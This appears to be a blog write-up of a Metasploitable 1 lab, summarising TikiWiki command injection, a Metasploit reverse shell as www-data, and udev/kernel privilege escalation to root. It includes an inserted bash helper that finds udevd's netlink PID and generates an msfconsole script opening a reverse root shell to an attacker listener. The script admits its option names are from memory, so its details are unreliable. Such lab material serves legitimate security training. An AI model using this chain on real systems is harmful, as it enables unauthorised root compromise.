We covered the first part of the Metasploitable 1 lab, where we demonstrated TikiWiki exploitation and Linux privilege escalation through a kernel exploit.

We also covered the second part of the Metasploitable 1 walkthrough, where we demonstrated Samba share enumeration and exploitation using smbclient and enum4linux.

We also covered the third part of the Metasploitable 1 walkthrough, where we exploited the Tomcat web server using Metasploit and performed Linux privilege escalation by exploiting a udev vulnerability.

Key Steps in the Metasploitable Exploitation

  1. Initial Scan and Target Identification
    • Used Nmap to scan the target for open ports and service versions.
    • Focused on a directory named tikiwiki found while enumerating the web server.
    • Noted an outdated Apache version in the service banner, a sign that the web stack was unpatched and worth a closer look.
  2. Identifying Vulnerabilities
    • Found a command injection vulnerability in the TikiWiki installation served from the tikiwiki directory.
    • Loaded the Metasploit Framework (msfconsole) and selected the module that exploits it for remote command execution.
  3. Using the Exploit
    • Selected a reverse TCP shell payload compatible with the exploit module.
    • Highlighted that the payload's platform and architecture must match the module; an incompatible pairing is rejected or fails without a session.
    • Established a reverse shell session as the restricted www-data user, the account the web server runs under.
  4. Privilege Escalation
    • Identified the system's Linux kernel version (2.6.x) with uname -r and checked it against known local privilege escalation exploits.
    • Searched Metasploit for applicable local exploit modules and downloaded the supporting scripts for the chosen one.
  5. Executing Privilege Escalation
    • Configured the module's required options, such as the session ID of the www-data shell and the netlink PID of the udevd socket (visible in /proc/net/netlink on the target).
    • Ran the exploit and received a new session running as root.
  6. Confirming Root Access
    • Verified root access with the id command (uid=0(root)).
    • Summarized the steps and emphasized that the unpatched kernel and local services were what turned a low-privilege web shell into full compromise.
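The two values step 5 asks for are easy to get wrong, so here is an added example (not code from the original walkthrough) of how a practitioner would derive them on the target. The `NETLINK_SAMPLE` text is a constructed stand-in for `/proc/net/netlink`; the module and option names (`exploit/linux/local/udev_netlink`, `SESSION`, `NetlinkPID`) are from memory of the Metasploit module and the LHOST/LPORT values are placeholders, so confirm them with `show options` before running.

```bash
#!/usr/bin/env bash
# Added example: derive the NetlinkPID value for the udev escalation step and
# emit the msfconsole resource script that uses it.  Not part of the original post.

# Constructed sample of /proc/net/netlink.  Columns: sk Eth Pid Groups Rmem Wmem Dump Locks.
# "Eth" is the netlink protocol number; 15 is NETLINK_KOBJECT_UEVENT, the family
# udevd listens on.  The kernel's own uevent socket appears with Pid 0.
NETLINK_SAMPLE='sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
ffff81003a1bd400 0   0      00000000 0        0        (null) 2
ffff81003a1bd000 15  0      00000000 0        0        (null) 2
ffff81003a1bdc00 15  2684   00000001 0        0        (null) 2
ffff81003a1bd800 16  0      00000000 0        0        (null) 2'

# Print the PID of the user-space socket on protocol 15 (udevd's uevent socket).
# Reads a /proc/net/netlink dump on stdin; on a live target:
#   udevd_netlink_pid < /proc/net/netlink
# Caveat: the exploit wants this socket PID, which is usually one less than the
# PID `ps` reports for udevd, so do not substitute the ps value.
udevd_netlink_pid() {
  awk 'NR > 1 && $2 == 15 && $3 != 0 { print $3; exit }'
}

# Build the msfconsole resource script for the escalation step.
# $1 = session id of the www-data shell, $2 = netlink PID found above.
# Module/option names are assumed from memory of the Metasploit module;
# LHOST/LPORT are placeholders for the attacker's listener.
udev_escalation_rc() {
  local session="$1" pid="$2"
  cat <<EOF
use exploit/linux/local/udev_netlink
set SESSION ${session}
set NetlinkPID ${pid}
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST 192.168.56.1
set LPORT 4445
run
EOF
}

# Stand-alone demonstration against the constructed sample.
pid="$(printf '%s\n' "$NETLINK_SAMPLE" | udevd_netlink_pid)"
udev_escalation_rc 1 "$pid"
```

Run the script output through `msfconsole -r escalate.rc` (or paste the lines into an existing console) once the www-data session is up; if `udevd_netlink_pid` prints nothing, udevd is not running or the target is using a newer uevent mechanism, and the module will not work.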

Video Walkthrough | P1

Video Walkthrough | P2

Video Walkthrough | P3

The attack chain relied on identifying the vulnerable TikiWiki application (flagged by an outdated Apache version in the banner) and a locally exploitable kernel and udev combination for privilege escalation.

Using Nmap for reconnaissance and the Metasploit Framework for exploitation was key to the process.

The post also demonstrated the necessity of properly configuring exploit options and matching payloads to modules.

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
